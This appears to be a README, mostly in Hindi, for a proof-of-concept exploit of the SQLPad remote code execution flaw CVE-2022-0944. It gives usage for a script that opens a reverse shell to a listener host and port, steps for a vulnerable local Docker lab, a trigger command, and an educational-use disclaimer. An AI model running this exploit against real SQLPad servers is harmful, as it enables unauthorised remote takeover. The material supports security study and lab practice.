
SQLPad RCE (CVE-2022-0944) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
एक प्रूफ ऑफ कॉन्सेप्ट शोषण SQLPad RCE (CVE-2022-0944) के लिए
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url SQLPad का URL
lhost रिवर्स शेल के लिए लिसनर होस्ट पता
lport रिवर्स शेल के लिए लिसनर पोर्ट
username लॉगिन उपयोगकर्ता नाम (वैकल्पिक)
password लॉगिन पासवर्ड (वैकल्पिक)
options:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
उदाहरण:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
इस रिपॉजिटरी में कोड और उपकरण हैं जो केवल शैक्षिक उद्देश्यों के लिए अभिप्रेत हैं, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और सीखने के वातावरण में उपयोग के लिए। इस कोड का लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न होने वाले किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेता है। कोड "जैसा है" बिना किसी वारंटी के प्रदान किया जाता है, चाहे वह स्पष्ट या निहित हो, जिसमें व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियां शामिल हैं, लेकिन इन्हीं तक सीमित नहीं है।